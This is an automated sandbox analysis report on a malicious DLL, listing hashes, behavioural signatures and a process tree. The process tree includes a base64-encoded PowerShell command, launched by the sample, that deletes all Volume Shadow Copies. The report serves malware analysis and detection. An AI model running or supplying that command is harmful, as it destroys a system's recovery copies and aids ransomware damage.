Analysis
-
max time kernel
91s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 03:35
Static task
static1
Behavioral task
behavioral1
Sample
9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll
Resource
win10v2004-20220414-en
General
-
Target
9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll
-
Size
164KB
-
MD5
f45b3caa097afbdd50358ede4042a88f
-
SHA1
685757998c553c84433410423daf9d5c9b6068c4
-
SHA256
9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148
-
SHA512
bf33d5439e01bece4efd21f356fa8619d0dc5dcb72e0c7366c6c3e82f8a909233281633a2cb67e7f92518d6e1dd374961dbfe0a07277a234f33f0bf623620c1f
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\R: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\U: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
rundll32.exepowershell.exepid process 2008 rundll32.exe 2008 rundll32.exe 4740 powershell.exe 4740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 4740 powershell.exe Token: SeBackupPrivilege 2196 vssvc.exe Token: SeRestorePrivilege 2196 vssvc.exe Token: SeAuditPrivilege 2196 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 5012 wrote to memory of 2008 5012 rundll32.exe rundll32.exe PID 5012 wrote to memory of 2008 5012 rundll32.exe rundll32.exe PID 5012 wrote to memory of 2008 5012 rundll32.exe rundll32.exe PID 2008 wrote to memory of 4740 2008 rundll32.exe powershell.exe PID 2008 wrote to memory of 4740 2008 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\9106117da853d8baa45ff6fdbf1ceada81dd4c2ce896787e445170a8d8c13148.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken